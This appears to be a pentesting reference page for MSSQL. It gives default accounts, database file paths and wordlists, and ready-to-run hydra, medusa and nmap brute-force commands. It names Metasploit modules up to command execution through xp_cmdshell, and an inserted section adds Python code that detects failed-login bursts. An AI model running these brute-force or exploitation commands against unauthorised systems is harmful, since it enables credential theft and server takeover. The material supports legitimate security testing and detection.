TCP 1433, UDP 1434: MSSQL Server

Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network.

-- Wikipedia

SQSH

General

Default admin account: sa

Interesting paths (example: Microsoft SQL Server 2017 14.00.1000.00)

C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\DATA\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup\master.bak

Brute force login

Wordlists

/usr/share/seclists/Passwords/Default-Credentials/mssql-betterdefaultpasslist.txt
/usr/share/seclists/Usernames/mssql-usernames-nansh0u-guardicore.txt
/usr/share/seclists/Passwords/mssql-passwords-nansh0u-guardicore.txt

Tools

hydra -L <users-file> -P <pw-file> <ip> mssql -vV
medusa -U <users-file> -P <pw-file> -M mssql -h <ip>
nmap -p 1433 --script=ms-sql-brute.nse --script-args userdb=<users-file>,passdb=<pw-file> <ip>
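Detection side of the brute-force tools above, as an added example that is not part of the original page: a sliding-window count of SQL Server ERRORLOG "Login failed" entries per client address. It assumes failed-login auditing is enabled on the server; the function name, thresholds and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# ERRORLOG line that accompanies error 18456 (login failed).
FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<ip>[^\]]+)\]"
)

def _line(sec, user, ip):
    # Builds one constructed log line in ERRORLOG layout.
    return (
        f"2024-03-01 10:00:{sec:02d}.10 Logon       Login failed for user '{user}'. "
        f"Reason: Password did not match that for the login provided. [CLIENT: {ip}]"
    )

# Constructed sample: six failures in six seconds from one client, one from another.
SAMPLE_LOG = "\n".join(
    [_line(s, u, "192.0.2.10")
     for s, u in enumerate(["sa", "sa", "admin", "sa", "sqlsvc", "sa"])]
    + [_line(30, "appuser", "198.51.100.7")]
)

def find_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {client_ip: {"failures": n, "users": set}} for every client that
    reaches `threshold` failed logins inside any `window_seconds` span."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)      # ip -> login names tried (many names = user list)
    totals = defaultdict(int)     # ip -> all failures seen in the log
    flagged = set()
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        ip = m["ip"]
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        users[ip].add(m["user"])
        totals[ip] += 1
        if len(q) >= threshold:
            flagged.add(ip)
    return {ip: {"failures": totals[ip], "users": users[ip]} for ip in flagged}
```
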

Metasploit

Find MSSQL instances

auxiliary/scanner/mssql/mssql_ping

Brute force login

auxiliary/scanner/mssql/mssql_login

Obtain command execution through xp_cmdshell using

exploit/windows/mssql/mssql_payload
